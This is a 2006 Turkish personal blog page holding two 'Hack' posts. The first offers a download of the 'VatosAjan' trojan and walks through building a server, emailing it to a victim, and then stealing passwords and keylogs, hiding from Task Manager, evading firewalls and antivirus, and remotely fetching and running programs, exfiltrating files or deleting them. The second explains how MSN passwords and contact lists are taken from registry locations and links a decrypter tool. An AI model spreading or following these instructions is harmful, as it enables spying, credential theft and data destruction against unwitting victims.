ARADIĞINIZ HERŞEY BURDA

8/11/2006 - <font color="red">Vatos ajanla istediğini hackle...</fo

Kategori: Hack

 

 

Download

 

zip şifresi:vatos

 

 

 

 


Vatos Ajan ile istediğiniz mail adresine trojan yedirerek mail şifrelerini bilgilerini ve birçok konu hakkında bilgi sahibi olabilirsiniz...

Resimde de gördüğünüz gibi program türkçe yapmanız gereken tek şey server oluşturup bunu karşı tarafa göndermek...
Olusturdunuz serverı sakın açmayın O Exe Dosyasını Rarlayıp veya Zİpleyıp karsı tarafa gönderım Daha Önce Mail test dedıgınızde sıze mail gelıcek o Exe Dosyasını karsı taraf açarsa O test et yazdıgınız maile gelıcektır TUm Bilgiler....

"AÇIKLAMA"

VatosAjan bulaştığı bilgisayarın özelliklerini,kurbanın şifre ve keylog kayıtlarını mailinize gönderen,
Sadece VatosAjanda bulunan WEB KONTROL özelliği ile router veya direk bağlantı farketmeksizin
kurbanın bilgisayarında dosya arama,
dosya silme,dosyaları mailinize gönderme,
internetten program indirip çalıştırabilme,
kayıtlı mail adresinizi değiştirebilme,
registry kayıtlarına ulaşabilme ve kendisini silme emirlerini
uygulayabilecek interaktif bir casus yazılımdır.
Server boyutu sadece 45 kb. olup dünyanın en küçük casus yazılımlarından biridir.
VatosAjan Windows görev yöneticisinde görünmez.
VatosAjan kendisini ve kullandığı tüm dosyaları disk üzerinde gizler.
Registrye bilgilerinizi kaydetmez.
VatosAjan kendisini default browsere enjekte ederek firewall engelini aşar.
VatosAjana özel dosya birleştirme kodu sayesinde serverde ek boyut artışı olmaz(sadece server + dosya)

Versiyon Farkları

-Windows Görev Yöneticisinden gizlendi.
-Console Application olarak yeniden yazıldı.
-Server boyutu yaklaşık %90 oranında küçültüldü.
-Browser enjeksiyonu ile firewall by pass edildi.
-Tüm mail adreslerine gönderim yapabilmesi sağlandı.
-CuteFtp,FlashFXP ve WSFTP programlarının kayıt doyalarının maille gönderilmesi sağlandı.
-.NET şifrelerinin alınması sağlandı.
-Sistem Geri Yükleme Özelliğinin kapatılması ve önceki kayıtların silinebilmesi sağlandı.
-Web Kontrol kullananlar için tüm disklerde dosya aranması sağlandı.

Server Oluşturma

-İletim Bilgileri alanına mailinizi ve kullanmak istiyorsanız Web Kontrol adresinizi yazınız.
-Web Kontrol kullanıp kullanmamanız size mail gelmesini etkilemez.
-Mail adresinize mail gönderilip gönderilmeyeceğini test ediniz.
-Mail gönderildi mesajı gelse dahi Mail adresinizi kontrol ediniz.
-Web Kontrol kullanacak iseniz aranmasını istediğiniz dosya uzantısını seçiniz.
-Bulunan sonuçlar ilk mailde gelecektir.
-Ayarlar bölümünden istediğinizi seçiniz.
-Serveri kendi bilgisayarında denemek isteyenlere geri yükleme noktasını silme ve
-Firewall ve antivirusleri kapatma seçeneklerini seçmemelerini öneririm.
-Kaspersky bile bir daha çalış***ıyor.Ancak tekrar kurmak gerekiyor.Benden uyarması...
-Serverin default uzantısı exe dir.İsterseniz değişik bir uzantı seçebilirsiniz.
-Server Simgesini değiştirmek için "Simge Seç" butonuna basınız ve açılan formdan bir simge seçiniz.
-Başka bir dosya ile birleştirmek için "Dosya Seç" butonuna basınız ve dosyanızı seçiniz.
-Son olarak "Server Oluştur" butonuna basınız.Serveriniz hazırlanmıştır.

Bilinmesi Gerekenler

-Server çalıştıktan sonra internetten çalışması için gerekli pluginleri dowload eder.
-Pluginleri download edeceği adres plugin butonuna basılarak görülebilir ve değiştirilebilir.
-Eğer free host değilde ücretli hostunuz var ise plugin adresinden plugin.exe yi kendi hostunuza
alabilirsiniz.Free hostunuz varsa adresini değiştirmenizi kesinlikle önermem.
-İlk Mailde şifrelerin gelmemesi normal bir durumdur.İkinci Mailden itibaren şifreler gelecektir.
-Web Kontrol Kullananların seçtikleri dosya uzantısı aranarak ilk maille sonuç find.txt olarak gönderilir.
-Server kill edildikten sonra browser Runtime Error hatası vermektedir.Eğer kendinizde denediyseniz
Serveri temizledikten sonra görev yöneticisinden browseri de kapatınız.
-Bilgisayarda CuteFTP,FlashFXP ve WSFTP Programlarının kayıt dosyaları aranır.
Kayıt bulunursa ek dosya olarak gönderilir.
-Gönderilecek ek dosya olmadığı zaman dahi Empty.txt isimli boş bir dosya gönderilir.
Neden diye sormayın öyle işte...
-Tercüme, Web tasarım ve photoshop ile ilgilenen ve projeye katkı sağlamak isteyenler benimle irtibata geçerlerse memnun olurum.

///////Alınabilen Şifreler\

# .NET Passport account
# MSN Messenger
# Windows Messenger (In Windows XP)
# Yahoo Messenger (Versions 5.x and 6.x)
# ICQ Lite 4.x/2003
# AOL Instant Messenger (only older versions, the password in newer versions of AIM cannot be recovered)
# AOL Instant Messenger/Netscape 7
# Trillian
# Miranda
# GAIM

# Outlook Express
# Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
# Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts)
# IncrediMail
# Eudora
# Netscape 6.x/7.x
# Mozilla Thunderbird
# Group Mail Free
# Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
# Hotmail/MSN mail - If the password is saved in MSN Messenger application.
# Gmail

#Otomatik tamamlanan Internet Explorer şifreleri,
#MSN Explorer Şifreleri,


VatosAjan Web Kontrol Emir hazırlama

Kurbanın bilgisayarına Web Kontrol ile ulaşabilmek için kurbanın bilgisayarının adını bilmelisiniz.
Bu bilgi serverin gönderdiği maildeki ComputerName Karşında yazıyor.
Yapılacak işlemler:
1-VatosAjan Programınında Web Kontrol yazan butona tıklayın
2-Kurbanın Bilgisayar adını yazınız.
3-Emirlerden birini seçiniz.
4-Bu adım Seçtiğiniz emire göre değişiyor.

Find
Açıklama :Bu emir kurbanın bilgisayarında istediğiniz uzantıdaki dosyaları
arayarak sonucun size gönderilmesini sağlar.
Kullanımı :Açılır kutudan aranmasını istediğiniz dosya uzantısını seçiniz ve Tamam butonuna basınız.

DownloadAndRun
Açıklama :İnternet adresini verdiğiniz bir programı kurbanın bilgisayarına download eder ve çalıştırır.
Kullanımı :Kutuya çalıştırılmasını istediğiniz programın internet adresini yazınız.

Send
Açıklama :Kurbanın bilgisayarında bulunan dosyaların mailinize gönderilmesini sağlar.
Bu emri verebilmek için size gönderilmesini istediğiniz dosyanın kurbanın bilgisayarındaki
tam yolunu bilmeniz gerekir.Find emrinin sonucunda gelen mailden kopyala yapıştır yapabilirsiniz.
Kullanımı :Kutuya istediğiniz dosyanın yam yolunu yazınız.

DeleteFile
Açıklama :Kurbanın bilgisayarında bulunan dosyaları sildirir.İstediğiniz sayıda dosya sildirebilirsiniz.
Kullanımı :Silinmesini istediğiniz dosyaların tam yolunu yazınız ve Ekle butonuna basınız.
Dosyaları eklemeniz bitince Tamam butonuna basınız.

Mail
Açıklama :Bu emir ile serverde kayıtlı mail adresinizi değiştirebilirsiniz.
Kullanımı :Yeni Mailinizi kutuya yazınız ve tamam butonuna basınız.

Registry
Açıklama :Kurbanın bilgisayarının registry bilgilerine ulaşmanızı sağlar.
Kullanımı :Önce Rootkeyi Seçiniz.Sonra bilgilerini almak istediğiniz Registry anahtarını kutuya yazınız.

KillServer
Açıklama :Serverin kendini imha etmesini sağlar.
Kullanmı :Sadece Tamam butonuna basınız.

5-Web Kontrol Emriniz hazırlandı ve kurbanın bilgisayarının adı ile kaydedildi.
Bu dosyayı web kontrol adresinize upload ediniz.
Kurbanınız online ise Server en geç 3 dakika içinde emrinizi yerine getirir

 

hacker by_golge

Yorum (1) :: Yorum yaz! :: Bağlantı

8/11/2006 - <font color="red">Rus hackerların yaptıklarını siz de yapı

Kategori: Hack

 

 

Rus Lamerler Nasıl Msn Hackler -
Bu yaziyi msn üzerinden gelen bir çok arkadaşimizin msn lerini kaptirmalari we gelen sorular üzerine bosh bir wakit buldugum için yaziyorum.......!!!

Senaryo-Gerçek 0lay????

Son günlerde bazi RUS hackerlar aldiklari kararla toplu MSN hack yapmaya başladilar....! HAtta bazı arkaslarimiz aynen anlattığına göre birileri MSN listlerine giriyor ,ufak konusmadan sonra herif msn list ini makinasinin IP sini soyluyor bizimkileri tehdit edip sifresini kırıyor we ayriliyor....! Üstüne üstlük bu olaylar sadece 2-3 dakika içinde oluyor...!Arkdaslarin söylediklerine görede ne fake mail v.s. gibi birsey gelmis nede dosya paylasimi yapmislar...........!!!!!

Böyle BirSey Olabilir Mi?

Her zaman dediğim gibi "impossible is nothing" in yaninda bir arastirma yaptim...!Burdaki göreceginiz ögreneginiz seyler aslinda yarimyamak bildiginiz ama önemsemediğiniz seylerden birisi...! Hadi başlayalim :~)

Ruslari Taniyalim????

Rus lari bilirsiniz cyber bazinda hepsi ii birer uygulamacidir "söze dikkat!" sadece uygulamaci yani Script Kiddie kisacasi Lamerdirler...!Kısacasi acigi ögrenip 1000 de 1 ihtimalde olsa uygularlar...!Onların bu özelliğini daha ii özetlemek gerekirse Bolu dagindan gecen İstanbul otabının yapimi öncesi (hani su İst-Ank 3 saaate indirecek yol) Bizmkiler nerdeyse vazgecek iken ,disaridan Rus we Ukrayna li mühendisler getirtmisler we inceletmisler Bolu dagini yarip otoyol olusturmak gercekten zordu ama inkansiz degildi bir rus mühendis in sözü "1 mm de ilerleyemiyor mu?" kisacasi onlarin uygulamaci karakterlerini anlatiyor...!
Bilgisayar ortaminda da Vlademir Levin in Citibank tan 1998 yıllarinda 10.000.000$ üzerinde bu hipotezi daha da güçlendiriyooo...!!! Neyse bende amma cok geyiq yaptim konuya gecelim dagitmadan!!!!!

Olayi kurgulayalim????

Bu olayı duyduktan sonra biraz arastirma yaptim...!Nasıl olabilir di ki......! HerkeZ windows ortamindaydi ama farkli farkli isletim sürümlerini kullaniyorlardi...!!!Kisacasi sistemin aciklarini sömürmeleri biraz zordu....!!!Ya MSN acigi yada bu platformlarin ortak aciklari olmaliydi....!!!
Msn de kiselerin listemizde olmasi we karsilikli konumamiz bile yeteri kadar acik oldugunu yazimizda görecegiz...!

0lay????

1E -postalarimizi bulmalari: Ruslar cesitli msn profilllerimizin kayıtlı oldugu msn sayfalari yada aram motoralrindan e posta adreslerimizi buluyorlardi...Bu cok kolay bi is 12-13 yasindaki bebeler bile yapar :~)
2.IP lerimizi ögrenmeleri:Bizim rus lamer listeye girdikten sonra ip mizi cmd den netstat -n cekip yada netstat -na (tü baglantilari portlarla listeler) yada daha acisibaglantilari dinleyen lamer tool lerle hallediyordu...
2.a Eğer bir proxy yada wingate v.s. kullaniyosak ip izi bulamayacaktir.Bunun için ya dosya gönderecek (o zaman direkt ip yi görür) yada ip izi descripte etmeye calisacaktir..Kimimiz msn proxy tool leri kullaniyoruz ki bendeki bile ispanyolca bağlanti için é-cafe tercih edersem tamamen korumasizim..1 :~)

3.Sifremizi Kırmasi:İste en önemlisi herkezin sifresi registriy de Hkey_Current_UserSoftwareMicrosoftMessengerServ icePasswordMSN Messenger Service anahtari altinda saklanir ama encrypte edilmistir yani cözülmeden okunamaz........!Bunun için
http://newdata.box.sk/2001/jan/win/MSDecripter.exe (http://newdata.box.sk/2001/jan/win/MSDecripter.exe) gibi bir program ile sifrenin okunmaz halini kendi bilgisayarinda cozecektir.Yada bazi sitelerde msnpwd.cgi lerde hash koyup eger önceden eklenmisse 30 sn içinde sifreyi okur...! Ewet ewet artik md5 i bile bu tür sitelerde bulabiliriz...!

4.Listemizi okumasi:Bizim lamer eğer listemize girmisze kendi bilgisayarinda 'HKEY_CURRENT_USERSoftwareMicrosoftMessengerSer viceListCache.NET Messenger Service' bu anahtara gidip kendi kontak kurdugu kubanin(bizikiler) nick ine tıklar yine encripte edilmistir ama cift tıkladiginda herifin kurbaninin tüm engelli izinli kisi listesini görür...! Sasirmayin ne oldu!!!! Bu bi arkasainizin üzerinde deniyebilrsiniz....!
5.Tel No Listesini Almak:Eger herif yeni ortaya cikan msn 7.0 acigi yada Netbios gibi paylasimlar la sizin bilgisayariniza girebilirse Regedit ten Ağ kaydina Bağlan a tıklayıp sizin pc nin İp sini yazar yine 'HKEY_CURRENT_USERSoftwareMicrosoftMessengerSer viceListCache.NET Messenger Service' anahtara gelip sizin
PHH (home telephone number) Ev telefon nosu
PHM (mobile telephone number) Cep telefonu nosu
PHW (work telephone number) İş telefonu nosu gibi kisi listesini ekleme özelliklerini kullaniyosaniz bilgileri ele gecirebilir...!
6.MsN List: Konuyla ilgili degil ama size bilgisayarimizdaki Msn i kimlerin kullandigi ile ilgili listenin nerde kayit edildigini wermek istedim.Hkey_Current_UserSoftwareMicrosoftMessenge rServ iceListCache.Net Messenger Service
7.Net ve Network Pass:Haa bu arada yeri gelmiskende soylemeden gecemedim WinXP de .NET(msn in işletim sistemine login için ilişkilendirilmis hali) we Network Pass lari ilk login den sonra hafizaya alir ve Documents and SettingsApplication DataMicrosoftCredentials. altinda saklar.Bazi arkadaşlarin kullandigi IM Pass Recovery yada Network Pasword Recovery gibi programlar bu anahtari yoklayip bulurlar...!(Bilrisiniz Cached olayiii)

DikkaT: Ben burda bildigim %100 calisan acikla nasil MsN saldirisi yapilacagini anlattim.Burada her sistemde olan aciklara deyindim...!Özellikle MsN sürümleri we diger aciklara deyinmedim.Zaten her yerde war.!!!!!!Özellikle ben kesin bu yöntemlerle hacklenirsiniz demiyorum....!!!Ama sömürülmesi en kolay aciklardir,ona göre önleminizi alın!!!!!!!!!

 

İNDİRİLERN DOSYALAR  ANTİLERE YAKALANİO BU DOSYALARİ ZİPLEYİM  TE YOLLAYINIZ...

Yorum (1) :: Yorum yaz! :: Bağlantı

<- :: Sonraki Sayfa ->

Hakkımda

hack,msn,korku odası,resimler,şiir,haber,spor,astroloji,eğlence,video,müzik,adult

Kategoriler

Arkadaşlarım

burcin
alwaystohate
sahin26
minecck
melektugba
gökhan şahin
mansur
cumhuriyethalkpartisi
candedim
nurullahtuna1432
musaaaa
genocide
gizablog
tubiimm
nevanindunyasi
mrch
gevezekizlar
gecelerburcuburcu
herteldenolay
canim07